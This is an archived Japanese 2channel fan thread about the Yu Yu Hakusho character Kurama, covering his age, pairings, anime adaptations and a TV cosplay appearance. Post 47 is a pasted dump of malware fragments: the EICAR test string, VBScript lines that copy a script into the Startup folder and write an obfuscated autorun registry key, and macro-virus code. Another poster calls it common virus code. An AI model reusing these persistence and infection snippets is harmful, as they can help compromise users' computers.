2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

幽遊白書の蔵馬スレッド 薔薇2.5本目

1 :名無しかわいいよ名無し:2006/12/18(月) 20:49:35 ID:YPfkXWnC
幽遊白書の蔵馬(南野秀一、妖狐)について語るスレです
原作(マンガ)の蔵馬についての語り・考察・妄想・萌えを投下してください

アニメの蔵馬について、過激な妄想ネタ→アニキャラ個別の蔵馬スレへ移動
アンチ、腐女子叩き、AVネタなど→この板にあるアンチスレへ移動

次スレは980〜990頃に立てて下さい

過去スレ
幽☆遊☆白書 蔵馬スッレド
http://comic6.2ch.net/test/read.cgi/cchara/1112751510/

蔵馬関連スレ
幽吐く蔵馬タンにみんなで禿しくハァハァするスレ
http://anime.2ch.net/test/read.cgi/anichara2/1155099457/

ゆうはくの(原作の)蔵馬について語るスレ
蔵馬好きはいかにもな美形クールキャラに飛びつくとか言われがちだけど
美形でクールなだけのキャラだったらそれこそ腐るほどいるし
自分は好きにならなかった。基本的に熱血系主人公ずきだから。
どこが魅力と思うかというと、親や仲間への優しさと、
それを傷つけたりする卑劣な相手への容赦ない残酷さという、
ギャップのようで繋がっているところ。
それでいてプライドは持ちつつも謙虚で嫌味がなく、かなり可愛い面があるところも魅力だと思う
皮肉好きで小悪魔チックなところや
妖狐のときに、悪役のようなセリフ言うところもギャップで。
別に理屈じゃないけど、蔵馬というキャラを文にしようとすると長くなってしまう。
それだけの魅力あるキャラだと思う。整合性がないとも言うかもしれないけど
ユウハクという流れに任せている中で偶然に出来た名キャラ。
初登場くらいは、よくあるいかにもなキャラで、
蔵馬というキャラがほとに生きてきたのは5巻くらいからだと思う
蔵馬に限った話じゃないけど、冨樫はキャラの見せ方が上手い
それでめるたんや例のAV女優のような人も生み出した訳だけど。
ただアニメはキャラ壊れすぎてた・・
皆無駄に一言多くて、それがすごい見当はずれな感じがした。
というわけで、鞍馬について語ったりカレーの作り方について教えあったり
煽り合ったりしてください。思うことはだいたい言ったので満足した。
腐女子叩きホモ叩きは程ほどに。

2 :名無しかわいいよ名無し:2006/12/18(月) 21:20:50 ID:pTx7HCRW
おらおら、WWF(World Wide Fund for Nature:世界自然保護基金)の
愛くるしいパンダ様が>>2ゲットだぜ! 頭が高いんだよ、ボケ!

.         ,:::-、       __     >1 クソスレ建ててんじゃねーよ。ビンスみてーに裁判で潰しちまうぞ。
    ,,r   〈:::::::::)    ィ::::::ヽ    >3 >>2ゲットも満足にできねーお前は、俺の着ぐるみ着てプラカード持ってろ(プ
  〃   ,::::;r‐'´       ヽ::ノ     >4 お前はカキフライのAAでも貼ってりゃいいんだよ、リア厨ヒッキー(プ
  ,'::;'   /::/  __            >5 汗臭いキモヲタデブは2ちゃんと一緒に人生終了させろ、バーカ。
.  l:::l   l::::l /:::::)   ,:::::、  ji     >6 いまさら>>2ゲット狙ってんじゃねーよ、タコ。すっトロいんだよ。
  |::::ヽ j::::l、ゝ‐′  ゙:;;:ノ ,j:l     >7 ラッキーセブンついでに教えてやるが、俺はストーンコールドが好きだぜ。
  }:::::::ヽ!::::::::ゝ、 <:::.ァ __ノ::;!     >8 知性のねーカキコだが、お前の人生の中で精一杯の自己表現かもな(プ
.  {::::::::::::::::::::::::::::`='=‐'´:::::::::/      >9 つーか、自作自演でこのスレ盛り上げて何が楽しいんだ?
  ';::::::::::::ト、::::::::::::::i^i::::::::::::/      >10-999 WWEなんか見てるヒマがあったら、俺に募金しろカスども。
.   `ー--' ヽ:::::::::::l l;;;;::::ノ       >1000 1000ゲットしたって、WWF時代の映像物に販売許可は出さねーよ。
        `ー-"

3 :名無しかわいいよ名無し:2006/12/18(月) 23:57:52 ID:T+D14SOt
乙です
dat落ちしないように保守がんばる
蔵馬萌え

4 :名無しかわいいよ名無し:2006/12/19(火) 00:01:24 ID:sHtv9y2r
>>1
乙〜。アニキャラ個別の方も落ちちゃったねー。orz
立てようと思ったんだけど無理ですた。


5 :名無しかわいいよ名無し:2006/12/19(火) 01:15:08 ID:+NjY5RjE
幽白蔵馬タンにハァハァしつつ画像うpするスレ
http://anime.2ch.net/test/read.cgi/anichara2/1166458414/l50

立ててきた
テンプレなど補足よろしく

6 :名無しかわいいよ名無し:2006/12/19(火) 01:38:19 ID:sHtv9y2r
>>5
感謝感激です。(人∀・)

http://qb5.2ch.net/test/read.cgi/saku/1152456218/161
アニキャラ個別のは前スレの方、何か削除以来出されてたっぽいね。
(スレタイに「画像」って入ってたのがまずかったらしい。)


7 :名無しかわいいよ名無し:2006/12/19(火) 18:10:21 ID:VKKKETTf
ほしゅ

8 :1:2006/12/20(水) 20:46:02 ID:6lvnvBzZ
>>6
ヤベ。スレタイに画像って入れたんだけど…('A`)どうすべ

9 :名無しかわいいよ名無し:2006/12/20(水) 23:57:39 ID:cX4ckWwA
>>8
えぇと6ですが、スレ立てる前に言っておけば良かったですね。ゴメンナサイorz
もしまた削除依頼が出されたら、その時はその時だからしょうがないかも…。

この後、向こうの方のスレのテンプレ置いておきますです。

10 :名無しかわいいよ名無し:2006/12/21(木) 00:41:57 ID:5Ic/V9cH
蔵馬大好き

11 :名無しかわいいよ名無し:2006/12/22(金) 02:17:53 ID:icWk2Ark
hosyu

12 :名無しかわいいよ名無し:2006/12/23(土) 15:01:31 ID:BlHSYq4N
hosyu

13 :名無しかわいいよ名無し:2006/12/25(月) 18:39:35 ID:TRqCFDzD
メリクリ!

14 :名無しかわいいよ名無し:2006/12/25(月) 22:21:18 ID:f7d6m8ei
考えて見りゃ蔵馬って最近までは純粋にあの真っ白い狐だったんだよなぁ。
そんで狐の頃から人間界うろうろしてたわけだよなぁ。
現代日本で人間に化けてうろついてるあの性格の蔵馬を想像すると
ちょっと笑えるなwカワユス

と、保守ばかりでは何なので話題を振ってみるよ。

15 :名無しかわいいよ名無し:2006/12/26(火) 12:17:50 ID:P6LrKfRE
え?人間界うろちょろはしてないんじゃない?
もとも魔界の狐かとおもってた

16 :名無しかわいいよ名無し:2006/12/28(木) 13:20:59 ID:TGt9ZnNQ
魔界の狐だよ。
で霊界特防隊だっけ、それに傷を負わされて人間界に逃げ込み
受精体に憑依したと。

てかなんで2.5本目なの、このスレ。

17 :名無しかわいいよ名無し:2006/12/28(木) 19:29:06 ID:HHDRw2tX
>>16
前スレが2本目でdat落ちしたから、2、5本目って訳。

18 :名無しかわいいよ名無し:2006/12/30(土) 03:28:12 ID:c+53X9rM
漫画の蔵馬タンはカッコ可愛い。
10巻の扉絵とか、完全版の表紙にハァハァ(*´Д`)

ところで前スレの最後のレスにフイタww

19 :名無しかわいいよ名無し:2006/12/30(土) 21:18:12 ID:QauiwxGJ
蔵馬って将来は社長になるの?

20 :名無しかわいいよ名無し:2006/12/31(日) 01:19:37 ID:lMZ4CqhO
hosyu

21 :名無しかわいいよ名無し:2006/12/31(日) 01:41:28 ID:ArzmhcVA
保守

22 :名無しかわいいよ名無し:2007/01/01(月) 04:22:34 ID:kTMx3YHT
蔵馬の年齢こしたけどいまだに憧れるわ

23 :名無しかわいいよ名無し:2007/01/01(月) 13:31:09 ID:fKNnOGts
最終巻辺りじゃ20歳くらいになってたのかな?
小学生の頃ものすごく好きだった
いや、今もだけど。

24 : 【吉】   【186円】 :2007/01/01(月) 14:30:37 ID:f4W+clDQ
>>23
20才までいってないと思う。17〜18才位じゃないかなぁ。
蔵馬タン早生まれらしいし。幽白の時間軸がよくワカラナス(´・ω・)ゴメポ

25 :名無しかわいいよ名無し:2007/01/01(月) 22:31:12 ID:EG/NlgwP
テレビ大阪うつるヤシ。
明日7時から蔵馬の活躍するよ。チェック

26 :名無しかわいいよ名無し:2007/01/02(火) 12:56:48 ID:+W6SyKC2
>>25
映らない・・・

妖狐タン(*´Д`)

27 :名無しかわいいよ名無し:2007/01/02(火) 13:02:46 ID:hHDDC8aZ
http://www.youtube.com/watch?v=RyZ-u9eiWXc&mode=related&search=
http://www.youtube.com/watch?v=Fha9UbyRa9g&mode=related&search=
http://www.youtube.com/watch?v=mu08vQtT-k8&NR
http://www.youtube.com/watch?v=zrZhDAwPPEA&search=yaoi%20hiei%20kurama%20yuyuhakusho
http://www.youtube.com/watch?v=1xv1BHXt4t4

28 :名無しかわいいよ名無し:2007/01/02(火) 15:32:29 ID:kb2t8hJe
下から二番目のハー○ルエッセンスのパロディ笑ったw

29 :名無しかわいいよ名無し:2007/01/02(火) 17:05:07 ID:MtmWfEwY
ようつべに日本語版があれば…

30 :名無しかわいいよ名無し:2007/01/03(水) 01:05:07 ID:fEmW6wWV
アメ板は太い男声だから嫌だ

31 :名無しかわいいよ名無し:2007/01/04(木) 20:39:13 ID:T0VXtM5a
マヤたんて変な髪形してるね

32 :名無しかわいいよ名無し:2007/01/07(日) 02:15:14 ID:cAN+rcTL
あの髪型は80年代を連想させる・・・。なんとなく。

摩耶タンといえば最近出たTwoShotsのドラマCD。
なんか妙に影が薄かった。腐女子が発狂しない為の仕様ですか?
あと蔵馬と飛影のやり取りが良かった。

33 :名無しかわいいよ名無し:2007/01/10(水) 16:59:23 ID:LRGw2RO+
>>32
漫画の方だとけっこう目立ってるのにね
蔵馬に恋人がいてもいいと思うんだけど、まやはなんか嫌だw

34 :名無しかわいいよ名無し:2007/01/14(日) 21:32:57 ID:2d9+7Y8x
hosyu

35 :名無しかわいいよ名無し:2007/01/15(月) 06:49:57 ID:Ktyo07c9
なんで妖狐の声って途中から代わったの?

36 :名無しかわいいよ名無し:2007/01/16(火) 10:20:06 ID:2GEe0FSj
>>33
ネットじゃ何故かぼたんが多い。

37 :名無しかわいいよ名無し:2007/01/16(火) 16:30:18 ID:ek2So7iV
余りもの同士というわけですね。

38 :名無しかわいいよ名無し:2007/01/16(火) 19:22:04 ID:H/+3j3By
>>37
余り物言うなw

39 :名無しかわいいよ名無し:2007/01/17(水) 13:01:38 ID:2PXZB4AZ
蔵馬とぼたんといえば、「手を貸そうか?」のツーショットが印象的だった

40 :名無しかわいいよ名無し:2007/01/17(水) 13:50:24 ID:SWwE5+3P
ttp://kuramabotan.50webs.com/index.html
海外サイトはーけん

41 :名無しかわいいよ名無し:2007/01/17(水) 22:18:54 ID:u4nbfpyj
おいきみたち

42 :名無しかわいいよ名無し:2007/01/17(水) 22:39:49 ID:y+ue7pJV
>>24
最終話なら蔵馬は20歳くらい行ってると思う。
最終巻で桑原や螢子が進路について会話してて、螢子が『教育大』行く話もしてるし
…となると幽助達より2歳年上の蔵馬は20歳位だとオモ

43 :名無しかわいいよ名無し:2007/01/18(木) 17:15:35 ID:au+tNudM
高校生の蔵馬よりも、スーツ姿の蔵馬のがいい感じ

44 :名無しかわいいよ名無し:2007/01/18(木) 23:06:19 ID:cwkDQkPd
スーツに長髪赤毛は似合わないな

45 :名無しかわいいよ名無し:2007/01/18(木) 23:46:11 ID:GnQfCoc/
蔵馬かっこいいvv

46 :名無しかわいいよ名無し:2007/01/19(金) 16:38:34 ID:cATth4TS
>>44
髪を切ればいいんだ!
かわいい中学生だった時のように

47 :名無しかわいいよ名無し:2007/01/19(金) 18:23:46 ID:+cRQ1acf
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


48 :名無しかわいいよ名無し:2007/01/19(金) 21:11:07 ID:l8rbtu2I
なんだこれ

49 :名無しかわいいよ名無し:2007/01/19(金) 21:55:43 ID:doQvhI6G
>>48
よくあるウィルスコードなので、無視するが吉。

50 :名無しかわいいよ名無し:2007/01/19(金) 22:50:42 ID:sM0AoA8m
巻原の口パックリ割った時の蔵馬の顔が昔からずっと好き。
あれはやばい。

51 :名無しかわいいよ名無し:2007/01/20(土) 00:26:15 ID:Uo2ormCH
禿同!

ついでにその後の兄者幻影モードの血塗れにもモエス

52 :名無しかわいいよ名無し:2007/01/21(日) 15:02:32 ID:OhaNioVe
しょこたんゲストの堂本兄弟で光一くんが蔵馬コスが放送されるそうです。

53 :名無しかわいいよ名無し:2007/01/21(日) 22:53:32 ID:obtYN/Df
剛はやっぱゆうすけかな

54 :名無しかわいいよ名無し:2007/01/22(月) 01:24:30 ID:vNIQMLLX
剛くんはなかったそうです。
最近の剛くんはユウスケって雰囲気でもないですから仕方ないかもですねorz

55 :名無しかわいいよ名無し:2007/01/22(月) 23:55:41 ID:3dCiqA95
それはいつ放送日?

56 :名無しかわいいよ名無し:2007/01/22(月) 23:59:44 ID:ii35inYO
情報うp

57 :名無しかわいいよ名無し:2007/01/23(火) 22:13:29 ID:aXWHfTuV
>>52
今週の?
光一が蔵馬って・・・・・赤い髪のカツラでもかぶるんだろうか

58 :名無しかわいいよ名無し:2007/01/24(水) 00:10:21 ID:PMqlilqm
2/11オンエアって見た気が…。
でもまじなのか??

赤い髪のカツラは笑える…。

59 :名無しかわいいよ名無し:2007/01/24(水) 00:28:45 ID:VbXCFep3
なんで蔵馬?
しょこたんは蔵馬が好きなのか?

60 :名無しかわいいよ名無し:2007/01/24(水) 00:43:06 ID:pFsPl6A3
つかしょこたんは、元々オタクとして有名だしw

61 :名無しかわいいよ名無し :2007/01/24(水) 02:20:27 ID:grGObDrX
ちなみにタカミーがセフィロスのコスらしいw

62 :名無しかわいいよ名無し:2007/01/24(水) 08:59:04 ID:fvwqqP5I
どうせなら魔界の狐で見てみたい…

63 :名無しかわいいよ名無し:2007/01/24(水) 11:37:40 ID:OENpTYc0
しょこたんは剣心もトランクスも好きなんだよな、確か
光一は「きれいなバラには、トゲがあるのさ」
とか言わされるんじゃないだろうなw

64 :名無しかわいいよ名無し:2007/01/24(水) 20:18:54 ID:6w8MSQJj
薔薇は、もたされたかくわえさせられたみたい。
アニメ顔だから似合うんじゃない?

65 :名無しかわいいよ名無し:2007/01/24(水) 22:32:24 ID:PMqlilqm
しょこたんナイス!
楽しみだ。

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)